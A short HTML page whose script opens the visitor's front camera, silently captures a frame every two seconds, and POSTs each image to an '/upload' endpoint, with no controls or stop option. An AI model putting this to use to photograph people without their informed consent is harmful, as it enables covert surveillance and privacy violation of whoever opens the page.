<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body>
<h3>Camera Active...</h3>

<video id="video" autoplay playsinline width="300"></video>
<canvas id="canvas" width="300" height="200" style="display:none;"></canvas>

<script>
let video = document.getElementById("video");
let canvas = document.getElementById("canvas");

navigator.mediaDevices.getUserMedia({
    video: { facingMode: "user" }   // FRONT CAMERA
})
.then(stream => {
    video.srcObject = stream;

    // 🔁 Every 2 seconds capture
    setInterval(capturePhoto, 2000);
});

function capturePhoto() {
    canvas.getContext("2d").drawImage(video, 0, 0, 300, 200);
    let data = canvas.toDataURL("image/png");

    fetch("/upload", {
        method: "POST",
        headers: { "Content-Type": "application/x-www-form-urlencoded" },
        body: new URLSearchParams({ image: data })
    });
}
</script>

</body>
</html>
